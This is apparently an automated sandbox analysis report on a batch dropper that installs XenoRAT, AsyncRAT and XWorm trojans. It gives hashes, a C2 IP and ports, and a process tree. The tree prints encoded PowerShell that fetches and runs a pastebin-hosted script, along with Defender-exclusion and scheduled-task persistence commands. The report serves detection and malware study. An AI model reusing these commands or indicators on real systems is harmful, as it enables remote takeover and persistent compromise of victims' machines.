Resubmissions

08-12-2024 23:35

241208-3k15zawkhx 10

08-12-2024 12:59

241208-p8a2ssypfk 10

Analysis

  • max time kernel
    1795s
  • max time network
    1800s
  • platform
    windows11-21h2_x64
  • resource
    win11-20241007-en
  • resource tags

    arch:x64, arch:x86, image:win11-20241007-en, locale:en-us, os:windows11-21h2-x64, system
  • submitted
    08-12-2024 23:35

General

  • Target

    LHVWN_virus_src.bat

  • Size

    680B

  • MD5

    28a24f08a62dc5c8af6be5e921d4c5ad

  • SHA1

    97f70c14a8e2ba4da9d8f5d65961d7d998ebb637

  • SHA256

    c76ca39fdae22faae9ae3799475307e34d351d02e048e3805a6ce5d6848db559

  • SHA512

    e9ec36ad33f78ac2871bb1a36a746ab74fd502b64fd01d36434192b2bc5244fc56d44ca5989af7de15bdf2b46a9a35990f759867ace6253ec9d1393e4cb9a577

Malware Config

Extracted

Family

xenorat

C2

82.13.154.169

Mutex

09f0agdksogvisd0gdsjpogijdsihg89t2374ygh23b5023gyd79srtdfgbalkfnmvsakfnsajdio32y8956tyhtijdesaiosahf85295u3497348huasnfjasfa86a7s6g70duhgfdaguh7dsa6gdayghdughuiagfad6ga760ghad8ga6gad75asfgagnhalkjs90436r7tgafhafyasuft7as5asf083y5sfsafsa789fyahufas

Attributes
  • delay

    5000

  • install_path

    appdata

  • port

    4445

  • startup_name

    svchost

Extracted

Family

asyncrat

Botnet

CompPkgSrv

C2

82.13.154.169:4446

Attributes
  • delay

    5

  • install

    true

  • install_file

    CompPkgSrv.exe

  • install_folder

    %AppData%

  • aes.plain

Extracted

Family

xworm

C2

82.13.154.169:4444

Attributes
  • Install_directory

    %AppData%

  • install_file

    CompPkgSup.exe

Signatures

  • AsyncRat

    AsyncRAT is a remote access tool written in C#, designed to remotely monitor and control other computers.

  • Asyncrat family
  • Detect XenoRat Payload 2 IoCs
  • Detect Xworm Payload 2 IoCs
  • XenoRat

    XenoRat is a remote access trojan written in C#.

  • Xenorat family
  • Xworm

    Xworm is a remote access trojan written in C#.

  • Xworm family
  • Async RAT payload 1 IoCs
  • Blocklisted process makes network request 3 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 8 IoCs

    Start PowerShell.

  • Drops startup file 2 IoCs
  • Executes dropped EXE 35 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 4 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 3 IoCs

    Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.

  • Delays execution with timeout.exe 1 IoCs
  • Modifies registry class 1 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 3 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 36 IoCs
  • Suspicious use of AdjustPrivilegeToken 42 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 43 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\LHVWN_virus_src.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:3368
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "Start-Process -Verb RunAs -FilePath 'C:\Users\Admin\AppData\Local\Temp\LHVWN_virus_src.bat' -ArgumentList "am_admin"
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Modifies registry class
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2012
      • C:\Windows\System32\cmd.exe
        "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\LHVWN_virus_src.bat" am_admin
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:4504
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell -NoLogo -enc KABpAHcAcgAgAGgAdAB0AHAAcwA6AC8ALwBwAGEAcwB0AGUAYgBpAG4ALgBjAG8AbQAvAHIAYQB3AC8AQQBlAHYAaAB1AEgAdgBaACkALgBjAG8AbgB0AGUAbgB0ACAAPgAgACQAZQBuAHYAOgBMAE8AQwBBAEwAQQBQAFAARABBAFQAQQBcAHMAeQBzAGIAbwBvAHQALgBwAHMAMQA=
          4⤵
          • Blocklisted process makes network request
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:4800
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell -NoLogo -enc cABvAHcAZQByAHMAaABlAGwAbAAgAC0AbgBvAGUAeABpAHQAIAAtAEUAeABlAGMAdQB0AGkAbwBuAFAAbwBsAGkAYwB5ACAAQgB5AHAAYQBzAHMAIAAtAEYAaQBsAGUAIAAkAGUAbgB2ADoATABPAEMAQQBMAEEAUABQAEQAQQBUAEEAXABzAHkAcwBiAG8AbwB0AC4AcABzADEADQAKAA==
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:2336
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit -ExecutionPolicy Bypass -File C:\Users\Admin\AppData\Local\sysboot.ps1
            5⤵
            • Blocklisted process makes network request
            • Command and Scripting Interpreter: PowerShell
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:5112
            • C:\Users\Admin\AppData\Local\svchost.exe
              "C:\Users\Admin\AppData\Local\svchost.exe"
              6⤵
              • Executes dropped EXE
              • System Location Discovery: System Language Discovery
              • Suspicious use of WriteProcessMemory
              PID:1688
              • C:\Users\Admin\AppData\Roaming\XenoManager\svchost.exe
                "C:\Users\Admin\AppData\Roaming\XenoManager\svchost.exe"
                7⤵
                • Executes dropped EXE
                • System Location Discovery: System Language Discovery
                • Suspicious use of WriteProcessMemory
                PID:5108
                • C:\Windows\SysWOW64\schtasks.exe
                  "schtasks.exe" /Create /TN "svchost" /XML "C:\Users\Admin\AppData\Local\Temp\tmpFCA0.tmp" /F
                  8⤵
                  • System Location Discovery: System Language Discovery
                  • Scheduled Task/Job: Scheduled Task
                  PID:2696
            • C:\Users\Admin\AppData\Local\CompPkgSrv.exe
              "C:\Users\Admin\AppData\Local\CompPkgSrv.exe"
              6⤵
              • Executes dropped EXE
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              • Suspicious use of WriteProcessMemory
              PID:840
              • C:\Windows\System32\cmd.exe
                "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "CompPkgSrv" /tr '"C:\Users\Admin\AppData\Roaming\CompPkgSrv.exe"' & exit
                7⤵
                • Suspicious use of WriteProcessMemory
                PID:3600
                • C:\Windows\system32\schtasks.exe
                  schtasks /create /f /sc onlogon /rl highest /tn "CompPkgSrv" /tr '"C:\Users\Admin\AppData\Roaming\CompPkgSrv.exe"'
                  8⤵
                  • Scheduled Task/Job: Scheduled Task
                  PID:4776
              • C:\Windows\system32\cmd.exe
                C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmp2BA.tmp.bat""
                7⤵
                • Suspicious use of WriteProcessMemory
                PID:4064
                • C:\Windows\system32\timeout.exe
                  timeout 3
                  8⤵
                  • Delays execution with timeout.exe
                  PID:1700
                • C:\Users\Admin\AppData\Roaming\CompPkgSrv.exe
                  "C:\Users\Admin\AppData\Roaming\CompPkgSrv.exe"
                  8⤵
                  • Executes dropped EXE
                  • Suspicious use of AdjustPrivilegeToken
                  PID:484
            • C:\Users\Admin\AppData\Local\CompPkgSup.exe
              "C:\Users\Admin\AppData\Local\CompPkgSup.exe"
              6⤵
              • Drops startup file
              • Executes dropped EXE
              • Adds Run key to start application
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              • Suspicious use of SetWindowsHookEx
              • Suspicious use of WriteProcessMemory
              PID:2044
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\CompPkgSup.exe'
                7⤵
                • Command and Scripting Interpreter: PowerShell
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:3068
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'CompPkgSup.exe'
                7⤵
                • Command and Scripting Interpreter: PowerShell
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:3420
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\CompPkgSup.exe'
                7⤵
                • Command and Scripting Interpreter: PowerShell
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:4704
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'CompPkgSup.exe'
                7⤵
                • Command and Scripting Interpreter: PowerShell
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:5012
              • C:\Windows\System32\schtasks.exe
                "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "CompPkgSup" /tr "C:\Users\Admin\AppData\Roaming\CompPkgSup.exe"
                7⤵
                • Scheduled Task/Job: Scheduled Task
                PID:4124
  • C:\Users\Admin\AppData\Roaming\CompPkgSup.exe
    C:\Users\Admin\AppData\Roaming\CompPkgSup.exe
    1⤵
    • Executes dropped EXE
    • Suspicious use of AdjustPrivilegeToken
    PID:2328
  • C:\Users\Admin\AppData\Roaming\CompPkgSup.exe
    C:\Users\Admin\AppData\Roaming\CompPkgSup.exe
    1⤵
    • Executes dropped EXE
    • Suspicious use of AdjustPrivilegeToken
    PID:1880
  • C:\Users\Admin\AppData\Roaming\CompPkgSup.exe
    C:\Users\Admin\AppData\Roaming\CompPkgSup.exe
    1⤵
    • Executes dropped EXE
    • Suspicious use of AdjustPrivilegeToken
    PID:1028
  • C:\Users\Admin\AppData\Roaming\CompPkgSup.exe
    C:\Users\Admin\AppData\Roaming\CompPkgSup.exe
    1⤵
    • Executes dropped EXE
    • Suspicious use of AdjustPrivilegeToken
    PID:4996
  • C:\Users\Admin\AppData\Roaming\CompPkgSup.exe
    C:\Users\Admin\AppData\Roaming\CompPkgSup.exe
    1⤵
    • Executes dropped EXE
    • Suspicious use of AdjustPrivilegeToken
    PID:3316
  • C:\Users\Admin\AppData\Roaming\CompPkgSup.exe
    C:\Users\Admin\AppData\Roaming\CompPkgSup.exe
    1⤵
    • Executes dropped EXE
    • Suspicious use of AdjustPrivilegeToken
    PID:4024
  • C:\Users\Admin\AppData\Roaming\CompPkgSup.exe
    C:\Users\Admin\AppData\Roaming\CompPkgSup.exe
    1⤵
    • Executes dropped EXE
    • Suspicious use of AdjustPrivilegeToken
    PID:4708
  • C:\Users\Admin\AppData\Roaming\CompPkgSup.exe
    C:\Users\Admin\AppData\Roaming\CompPkgSup.exe
    1⤵
    • Executes dropped EXE
    • Suspicious use of AdjustPrivilegeToken
    PID:4696
  • C:\Users\Admin\AppData\Roaming\CompPkgSup.exe
    C:\Users\Admin\AppData\Roaming\CompPkgSup.exe
    1⤵
    • Executes dropped EXE
    • Suspicious use of AdjustPrivilegeToken
    PID:2144
  • C:\Users\Admin\AppData\Roaming\CompPkgSup.exe
    C:\Users\Admin\AppData\Roaming\CompPkgSup.exe
    1⤵
    • Executes dropped EXE
    • Suspicious use of AdjustPrivilegeToken
    PID:4108
  • C:\Users\Admin\AppData\Roaming\CompPkgSup.exe
    C:\Users\Admin\AppData\Roaming\CompPkgSup.exe
    1⤵
    • Executes dropped EXE
    • Suspicious use of AdjustPrivilegeToken
    PID:4852
  • C:\Users\Admin\AppData\Roaming\CompPkgSup.exe
    C:\Users\Admin\AppData\Roaming\CompPkgSup.exe
    1⤵
    • Executes dropped EXE
    • Suspicious use of AdjustPrivilegeToken
    PID:1300
  • C:\Users\Admin\AppData\Roaming\CompPkgSup.exe
    C:\Users\Admin\AppData\Roaming\CompPkgSup.exe
    1⤵
    • Executes dropped EXE
    • Suspicious use of AdjustPrivilegeToken
    PID:4512
  • C:\Users\Admin\AppData\Roaming\CompPkgSup.exe
    C:\Users\Admin\AppData\Roaming\CompPkgSup.exe
    1⤵
    • Executes dropped EXE
    • Suspicious use of AdjustPrivilegeToken
    PID:2404
  • C:\Users\Admin\AppData\Roaming\CompPkgSup.exe
    C:\Users\Admin\AppData\Roaming\CompPkgSup.exe
    1⤵
    • Executes dropped EXE
    • Suspicious use of AdjustPrivilegeToken
    PID:3676
  • C:\Users\Admin\AppData\Roaming\CompPkgSup.exe
    C:\Users\Admin\AppData\Roaming\CompPkgSup.exe
    1⤵
    • Executes dropped EXE
    • Suspicious use of AdjustPrivilegeToken
    PID:2760
  • C:\Users\Admin\AppData\Roaming\CompPkgSup.exe
    C:\Users\Admin\AppData\Roaming\CompPkgSup.exe
    1⤵
    • Executes dropped EXE
    • Suspicious use of AdjustPrivilegeToken
    PID:2944
  • C:\Users\Admin\AppData\Roaming\CompPkgSup.exe
    C:\Users\Admin\AppData\Roaming\CompPkgSup.exe
    1⤵
    • Executes dropped EXE
    • Suspicious use of AdjustPrivilegeToken
    PID:2428
  • C:\Users\Admin\AppData\Roaming\CompPkgSup.exe
    C:\Users\Admin\AppData\Roaming\CompPkgSup.exe
    1⤵
    • Executes dropped EXE
    • Suspicious use of AdjustPrivilegeToken
    PID:4180
  • C:\Users\Admin\AppData\Roaming\CompPkgSup.exe
    C:\Users\Admin\AppData\Roaming\CompPkgSup.exe
    1⤵
    • Executes dropped EXE
    • Suspicious use of AdjustPrivilegeToken
    PID:4572
  • C:\Users\Admin\AppData\Roaming\CompPkgSup.exe
    C:\Users\Admin\AppData\Roaming\CompPkgSup.exe
    1⤵
    • Executes dropped EXE
    • Suspicious use of AdjustPrivilegeToken
    PID:4964
  • C:\Users\Admin\AppData\Roaming\CompPkgSup.exe
    C:\Users\Admin\AppData\Roaming\CompPkgSup.exe
    1⤵
    • Executes dropped EXE
    • Suspicious use of AdjustPrivilegeToken
    PID:4060
  • C:\Users\Admin\AppData\Roaming\CompPkgSup.exe
    C:\Users\Admin\AppData\Roaming\CompPkgSup.exe
    1⤵
    • Executes dropped EXE
    • Suspicious use of AdjustPrivilegeToken
    PID:2488
  • C:\Users\Admin\AppData\Roaming\CompPkgSup.exe
    C:\Users\Admin\AppData\Roaming\CompPkgSup.exe
    1⤵
    • Executes dropped EXE
    • Suspicious use of AdjustPrivilegeToken
    PID:2552
  • C:\Users\Admin\AppData\Roaming\CompPkgSup.exe
    C:\Users\Admin\AppData\Roaming\CompPkgSup.exe
    1⤵
    • Executes dropped EXE
    • Suspicious use of AdjustPrivilegeToken
    PID:5100
  • C:\Users\Admin\AppData\Roaming\CompPkgSup.exe
    C:\Users\Admin\AppData\Roaming\CompPkgSup.exe
    1⤵
    • Executes dropped EXE
    • Suspicious use of AdjustPrivilegeToken
    PID:4520
  • C:\Users\Admin\AppData\Roaming\CompPkgSup.exe
    C:\Users\Admin\AppData\Roaming\CompPkgSup.exe
    1⤵
    • Executes dropped EXE
    • Suspicious use of AdjustPrivilegeToken
    PID:3512
  • C:\Users\Admin\AppData\Roaming\CompPkgSup.exe
    C:\Users\Admin\AppData\Roaming\CompPkgSup.exe
    1⤵
    • Executes dropped EXE
    • Suspicious use of AdjustPrivilegeToken
    PID:868
  • C:\Users\Admin\AppData\Roaming\CompPkgSup.exe
    C:\Users\Admin\AppData\Roaming\CompPkgSup.exe
    1⤵
    • Executes dropped EXE
    • Suspicious use of AdjustPrivilegeToken
    PID:5004
  • C:\Users\Admin\AppData\Roaming\CompPkgSup.exe
    C:\Users\Admin\AppData\Roaming\CompPkgSup.exe
    1⤵
    • Executes dropped EXE
    • Suspicious use of AdjustPrivilegeToken
    PID:4612

Network

MITRE ATT&CK Enterprise v15

Downloads

  • C:\Users\Admin\AppData\Local\CompPkgSrv.exe

    Filesize

    63KB

  • C:\Users\Admin\AppData\Local\CompPkgSup.exe

    Filesize

    80KB

  • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\CompPkgSrv.exe.log

    Filesize

    871B

  • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\CompPkgSup.exe.log

    Filesize

    654B

  • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

    Filesize

    2KB

  • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\svchost.exe.log

    Filesize

    226B

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

    Filesize

    944B

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

    Filesize

    944B

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

    Filesize

    944B

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

    Filesize

    64B

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

    Filesize

    1KB

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ouebz4z0.kv1.ps1

    Filesize

    60B

  • C:\Users\Admin\AppData\Local\Temp\tmp2BA.tmp.bat

    Filesize

    153B

  • C:\Users\Admin\AppData\Local\Temp\tmpFCA0.tmp

    Filesize

    1KB

  • C:\Users\Admin\AppData\Local\svchost.exe

    Filesize

    46KB

  • C:\Users\Admin\AppData\Local\sysboot.ps1

    Filesize

    1KB
